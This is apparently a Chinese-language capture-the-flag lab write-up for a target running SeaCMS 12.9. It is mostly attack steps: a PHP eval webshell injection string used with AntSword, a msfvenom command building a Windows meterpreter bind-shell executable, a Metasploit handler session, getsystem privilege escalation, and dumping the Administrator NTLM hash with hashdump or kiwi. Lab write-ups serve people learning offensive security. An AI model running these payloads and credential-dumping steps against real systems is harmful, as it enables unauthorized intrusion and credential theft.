PT-1

flag01

打开靶机是一个电影网站,查到该网站的CMS是seacms版本12.9 存在漏洞,可以写入木马

1";@eval($_POST[cmd]);;//

使用蚁剑连接就行了,然后文件管理找flag01

flag02

flag02的要求是提交amdinistrator的ntlmhash

靶机不能出网,所以利用msf生成木马,然后正向连接

msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > shell.exe 生成木马文件

然后再开启正向连接

1
2
3
4
5
6
7
8
9
10
11
msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/bind_tcp

set rhost 10.0.0.68

set lport 4444

run

然后提权使用getsystem

然后使用hashdump或者使用load kiwi就可以拿到hash了